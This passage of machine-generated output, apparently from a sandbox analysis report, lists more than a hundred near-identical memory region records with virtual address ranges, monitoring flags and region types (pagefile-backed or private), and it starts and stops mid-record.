pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5931 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5932 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5933 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5934 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 5935 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 5936 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5937 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5938 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5939 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5940 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5941 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5942 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5943 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5944 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5945 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5946 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5947 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5948 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5949 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5950 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5951 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5952 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5953 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5954 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5955 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5956 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5957 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5958 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5959 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5960 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5961 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5962 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5963 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5964 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5965 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5966 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5967 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5968 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5969 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5970 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5971 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5972 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5973 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5974 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5975 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5976 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5977 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5978 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5979 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5980 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5981 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5982 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5983 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5984 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5985 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5986 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5987 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5988 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5989 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5990 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5991 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5992 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5993 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5994 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5995 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5996 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5997 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5998 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5999 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6000 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6001 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6002 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6003 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6004 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6005 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6006 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6007 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6008 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6009 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6010 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6011 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6012 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6013 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6014 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6015 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6016 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6017 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6018 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6019 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6020 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6021 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6022 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6023 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6024 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6025 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6026 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6027 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6028 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6029 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6030 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6031 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6032 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6033 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6034 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6035 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6036 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6037 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6038 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6039 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6040 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6041 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6042 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6043 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6044 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 6045 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 6046 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6047 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6048 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6049 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6050 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6051 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6052 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6053 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6054 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6055 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6056 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6057 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6058 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6059 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6060 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6061 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6062 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6063 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6064 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6065 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6066 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6067 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6068 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6069 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6070 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6071 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6072 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6073 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6074 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6075 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6076 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6077 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6078 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6079 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6080 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6081 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6082 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6083 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6084 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6085 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6086 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6087 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6088 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6089 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6090 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6091 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6092 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6093 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6094 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6095 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6096 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6097 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6098 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6099 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6100 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6101 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6102 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6103 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6104 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6105 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6106 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6107 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6108 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6109 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6110 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6111 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6112 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6113 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6114 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6115 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6116 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6117 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6118 start_va = 0x2880000 end_va = 0x288efff monitored = 1 